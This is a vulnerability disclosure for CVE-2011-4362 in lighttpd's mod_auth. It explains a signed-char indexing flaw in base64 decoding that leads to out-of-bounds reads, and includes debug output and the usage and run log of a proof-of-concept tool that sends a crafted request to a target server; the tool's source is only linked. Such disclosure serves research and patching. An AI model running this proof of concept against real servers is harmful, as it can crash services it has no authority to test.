29 November 2011 was the date of public disclosure of an interesting
|
|
vulnerability in lighttpd server. Xi Wang discovered that mod_auth
|
|
for this server does not properly decode characters from the extended
|
|
ASCII table. The vulnerable code is below:
|
|
|
|
|
|
"src/http_auth.c:67"
|
|
--- CUT ---
|
|
static const short base64_reverse_table[256] = ...;
|
|
static unsigned char * base64_decode(buffer *out, const char *in) {
|
|
...
|
|
int ch, ...;
|
|
size_t i;
|
|
...
|
|
|
|
ch = in[i];
|
|
...
|
|
ch = base64_reverse_table[ch];
|
|
...
|
|
}
|
|
--- CUT ---
|
|
|
|
Because the variable 'in' is of type 'char', which is signed here, characters at or above 0x80 lead to
|
|
negative indices into base64_reverse_table (indexing with the byte cast to 'unsigned char' would avoid this).
|
|
This vulnerability may lead to an out-of-bounds read and theoretically cause a
|
|
Segmentation Fault (Denial of Service attack).
|
|
Unfortunately I couldn't find any binaries where the .rodata section before
|
|
the base64_reverse_table
|
|
table is laid out so as to cause this situation (a fault on the out-of-bounds read).
|
|
|
|
I have added some extra debug output to the lighttpd source code to see if this
|
|
vulnerability is
|
|
triggers as expected. Here is the output for one of the examples:
|
|
|
|
--- CUT ---
|
|
ptr[0x9a92c48] size[0xc0] used[0x0]
|
|
127(. | 0 | 0)
|
|
-128(t | 1 | 0)
|
|
-127(e | 2 | 1)
|
|
-126(' | 3 | 2)
|
|
-125(e | 4 | 3)
|
|
-124(u | 5 | 3)
|
|
-123(r | 6 | 4)
|
|
-122(' | 7 | 5)
|
|
-121(s | 8 | 6)
|
|
-120(c | 9 | 6)
|
|
-119(i | 10 | 7)
|
|
-118(n | 11 | 8)
|
|
-117(i | 12 | 9)
|
|
-116( | 13 | 9)
|
|
-115(a | 14 | 10)
|
|
-114(t | 15 | 11)
|
|
-113(. | 16 | 12)
|
|
-112(e | 17 | 12)
|
|
-111(u | 18 | 13)
|
|
-110(r | 19 | 14)
|
|
-109(' | 20 | 15)
|
|
-108(f | 21 | 15)
|
|
-107(i | 22 | 16)
|
|
-106(e | 23 | 17)
|
|
-105(: | 24 | 18)
|
|
-104(= | 25 | 18)
|
|
-103(o | 26 | 19)
|
|
-102(t | 27 | 20)
|
|
-101(o | 28 | 21)
|
|
-100( | 29 | 21)
|
|
-99(a | 30 | 22)
|
|
-98(g | 31 | 23)
|
|
-97(. | 32 | 24)
|
|
-96(d | 33 | 24)
|
|
-95(g | 34 | 25)
|
|
-94(s | 35 | 26)
|
|
-93(: | 36 | 27)
|
|
-92(u | 37 | 27)
|
|
-91(s | 38 | 28)
|
|
-90(p | 39 | 29)
|
|
-89(o | 40 | 30)
|
|
-88(t | 41 | 30)
|
|
-87(d | 42 | 31)
|
|
-86(b | 43 | 32)
|
|
-85(c | 44 | 33)
|
|
-84(e | 45 | 33)
|
|
-83(d | 46 | 34)
|
|
-82(( | 47 | 35)
|
|
-81(n | 48 | 36)
|
|
-80(y | 49 | 36)
|
|
-79(h | 50 | 37)
|
|
-78(d | 51 | 38)
|
|
-77(g | 52 | 39)
|
|
-76(s | 53 | 39)
|
|
-75( | 54 | 40)
|
|
-74(r | 55 | 41)
|
|
-73(p | 56 | 42)
|
|
-72(a | 57 | 42)
|
|
-71(n | 58 | 43)
|
|
-70(. | 59 | 44)
|
|
-69(. | 60 | 45)
|
|
-68(d | 61 | 45)
|
|
-67(g | 62 | 46)
|
|
-66(s | 63 | 47)
|
|
-65(: | 64 | 48)
|
|
-64(( | 65 | 48)
|
|
-63(d | 66 | 49)
|
|
-62(- | 67 | 50)
|
|
-61(e | 68 | 51)
|
|
-60(s | 69 | 51)
|
|
-59( | 70 | 52)
|
|
-58(i | 71 | 53)
|
|
-57(s | 72 | 54)
|
|
-56(n | 73 | 54)
|
|
-55( | 74 | 55)
|
|
-54(i | 75 | 56)
|
|
-53(l | 76 | 57)
|
|
-52(. | 77 | 57)
|
|
-51(. | 78 | 58)
|
|
-50(k | 79 | 59)
|
|
-49(0 | 80 | 60)
|
|
-48(% | 81 | 60)
|
|
-47(] | 82 | 61)
|
|
-46(p | 83 | 62)
|
|
-45(r | 84 | 63)
|
|
-44(0 | 85 | 63)
|
|
-43(% | 86 | 64)
|
|
-42(] | 87 | 65)
|
|
-41(s | 88 | 66)
|
|
-40(z | 89 | 66)
|
|
-39([ | 90 | 67)
|
|
-38(x | 91 | 68)
|
|
-37(x | 92 | 69)
|
|
-36( | 93 | 69)
|
|
-35(s | 94 | 70)
|
|
-34(d | 95 | 71)
|
|
-33(0 | 96 | 72)
|
|
-32(% | 97 | 72)
|
|
-31(] | 98 | 73)
|
|
-30(. | 99 | 74)
|
|
-29(. | 100 | 75)
|
|
-28(d | 101 | 75)
|
|
-27(c | 102 | 76)
|
|
-26(d | 103 | 77)
|
|
-25(i | 104 | 78)
|
|
-24(g | 105 | 78)
|
|
-23(b | 106 | 79)
|
|
-22(s | 107 | 80)
|
|
-21(6 | 108 | 81)
|
|
-20(- | 109 | 81)
|
|
-19(t | 110 | 82)
|
|
-18(i | 111 | 83)
|
|
-17(g | 112 | 84)
|
|
-16(f | 113 | 84)
|
|
-15(i | 114 | 85)
|
|
-14(e | 115 | 86)
|
|
-13(. | 116 | 87)
|
|
-12(. | 117 | 87)
|
|
-11(. | 118 | 88)
|
|
-10(. | 119 | 89)
|
|
-9(. | 120 | 90)
|
|
-8(. | 121 | 90)
|
|
-7(. | 122 | 91)
|
|
-6(. | 123 | 92)
|
|
-5(. | 124 | 93)
|
|
-4(. | 125 | 93)
|
|
-3(. | 126 | 94)
|
|
-2(. | 127 | 95)
|
|
-1(. | 128 | 96)
|
|
k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]
|
|
ptr[0x9a92c48] size[0xc0] used[0x60]
|
|
string [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.]
|
|
--- CUT ---
|
|
|
|
The first column is the offset, so the vulnerability triggers like it should
|
|
(negative offsets). The second column is the byte which is read out-of-bounds.
|
|
|
|
How do you run this very primitive Proof of Concept?
|
|
|
|
$ gcc p_cve-2011-4362.c -o p_cve-2011-4362
|
|
$ ./p_cve-2011-4362
|
|
|
|
...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)
|
|
]=- :::...
|
|
|
|
Usage: ./p_cve-2011-4362 <options>
|
|
|
|
Options:
|
|
-v <victim>
|
|
-p <port>
|
|
-d <remote_dir_for_auth>
|
|
|
|
$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa
|
|
|
|
...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)
|
|
]=- :::...
|
|
|
|
[+] Preparing arguments... OK
|
|
[+] Creating socket... OK
|
|
[+] Connecting to [127.0.0.1]... OK
|
|
[+] Sending dirty packet... OK
|
|
|
|
[+] Check the website!
|
|
|
|
$
|
|
|
|
Lighttpd will probably log this situation in the error-log file like this:
|
|
|
|
--- CUT ---
|
|
..
|
|
..
|
|
2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in
|
|
?Yg\???n?Xt?]rze???gY??\??Yb?Y(?d??r?[Y???-?xi??i?k?Wp? ]???\???@V??x???ize
|
|
|
|
--- CUT ---
|
|
|
|
Maybe you can find a vulnerable binary?
|
|
|
|
Best regards,
|
|
Adam 'pi3' Zabrocki
|
|
|
|
|
|
--
|
|
http://pi3.com.pl
|
|
http://www.exploit-db.com/sploits/p_cve-2011-4362.c
|
|
http://blog.pi3.com.pl/?p=277
|